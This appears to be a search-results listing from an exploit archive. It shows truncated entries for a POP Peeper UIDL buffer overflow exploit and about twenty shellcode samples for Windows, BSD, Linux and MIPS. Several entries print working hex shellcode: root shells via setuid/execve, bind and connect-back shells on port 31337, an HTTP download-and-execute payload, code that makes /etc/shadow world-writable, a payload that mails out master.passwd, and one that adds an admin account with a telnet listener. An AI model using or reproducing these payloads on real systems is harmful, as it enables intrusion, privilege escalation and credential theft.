7261 matches found
Pop Peeper 3.4.0.0 UIDL Buffer Overflow Exploit
!/usr/bin/perl KL0209EXP-poppeeperuidl-bof.pl 02.27.2009 Krakow Labs Development www.krakowlabs.com POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit SEH overwrite exploitation, uses Imap.dll included with POP Peeper for universal exploitation gotta love no /SafeSEH. Special thanks goes to...
win32 telnetbind by winexec 111 bytes
Exploit for win32 platform in category shellcode ===================================== win32 telnetbind by winexec 111 bytes ===================================== ; payload:add admin account & Telnet Listening ; Author: DATASNIPER ; size:111 bytes ; platform:WIN32/XP SP2 FR ; thanks:Arab4services...
win32 PEB!NtGlobalFlags shellcode 14 bytes
Exploit for win32 platform in category shellcode ========================================== win32 PEB!NtGlobalFlags shellcode 14 bytes ========================================== / PEB!NtGlobalFlags 14 BYTES Author: Koshi Description: Uses PEB method to determine whether a debugger is attached to...
BSD/32bits - Passive Connection - 126 bytes
No description provided by source. ; Passive Connection Shellcode ; ; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades firewalls... ; ; YES, this is for NASM, I detest AT&T syntax - it's gross and unreadable ; ; This is the FreeBSD...
BSD/x86 - setuid/portbind - 94 bytes
No description provided by source. / $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ portbind-bsd.c - setuid/portbind shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Simple portbind shellcode that binds a setuid0 shell on port 31337/tcp based on bighawk's...
BSD/x86 - setuid/execve - 30 bytes
No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. Tested on OpenBSD and FreeBSD. / ...
BSD/x86 - cat /etc/master.passwd & mail root@localhost - 92 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 92 bytes. execve/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"; you can replace the command with whatever you like. / char shellcode= "\xeb\x25" / jmp shellcode+39 / "\x59" / popl...
BSD/x86 - execve(/bin/sh) - 27 bytes
No description provided by source. / execvesh.c by n0gada 27 bytes. / include "stdio.h" char shellcode= "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2" "\x52\x57\x54\xb0\x3b\xcd\x80\xe8" "\xee\xff\xff\xff/bin/sh"; int mainvoid int ret; printf"%d\n",strlenshellcode; ret = int &ret+2; ret = intshellcode; return...
BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...
Linux/x86 - chmod 666 /etc/shadow - 41 bytes
No description provided by source. / [email protected] 0x04abril0x7d2 int syschmodconst char filename, modet mode ... Using interrupt 15 (chmod), assigning octal 0666 to the desired file. In this case /etc/shadow. I made some modifications to the code and could only reduce the...
Linux/sparc - [setreuid(0,0); execve() of /bin/sh] - 64 bytes
No description provided by source. / Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema [email protected] / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x09" / and %o1, %o1, %o0 / "\x91\xd0\x20\x10" / ta...
Linux/x86 - HTTP/1.x GET, Downloads & execve()
No description provided by source. / linux/x86 - HTTP/1.x GET, Downloads and execve - 111 bytes+ This shellcode allows you to download an ELF executable straight off a standard HTTP server and launch it. It will be saved locally into a filename called 'A' in the current directory. CONFIGURATION Th...
Linux/x86 - symlink /bin/sh xoring
No description provided by source. /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version with anti IDS xoring size = 56 bytes OS = BSD written by /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor ecx,e...
Linux/x86 - connect-back 127.0.0.1:31337/tcp - 74 bytes
No description provided by source. / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" /...
Linux/sparc - setreuid(0,0)&standard execve(). 72 bytes
No description provided by source. / Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" / Aleph One : /...
Linux/x86 - System Beep
No description provided by source. / By Thomas Rinsma meatth0mas.nl 16 apr. 2008 Shellcode makes system speaker beep once, 45 bytes: ; int fd = open"/dev/tty10", ORDONLY; push byte 5 pop eax cdq push edx push 0x30317974 push 0x742f2f2f push 0x7665642f mov ebx, esp mov ecx, edx int 80h ; ioctlfd,...
Linux/x86 - execve(/bin/sh) - 16 bytes
No description provided by source. / $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46 raptor Exp $ reusage-linux.c - re-use of "/bin/sh" string in .rodata Copyright c 2003 Marco Ivaldi [email protected] Short local shellcode for /bin/sh execve. It re-uses the "/bin/sh" string stored in the...
Linux/x86 - bind '/bin/sh' to 31337/tcp & fork() - 98 bytes
No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0...
Linux/x86 - connect-back "11.22.33.44",31337/tcp - 90 bytes
No description provided by source. /--------------------------------------------------------------------------- 90 byte Connect Back shellcode by Russell Sanford - [email protected] --------------------------------------------------------------------------- filename: x86-linux-connect-back.c info:...
Linux/mips - execve("/bin/sh",["/bin/sh"],[]); - 60 bytes
No description provided by source. / - MIPS little-endian - linux execve 60 bytes shellcode - execve"/bin/sh","/bin/sh",; - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail dot com / include "stdio.h" char shellcode = "\x50\x73\x06\x24"...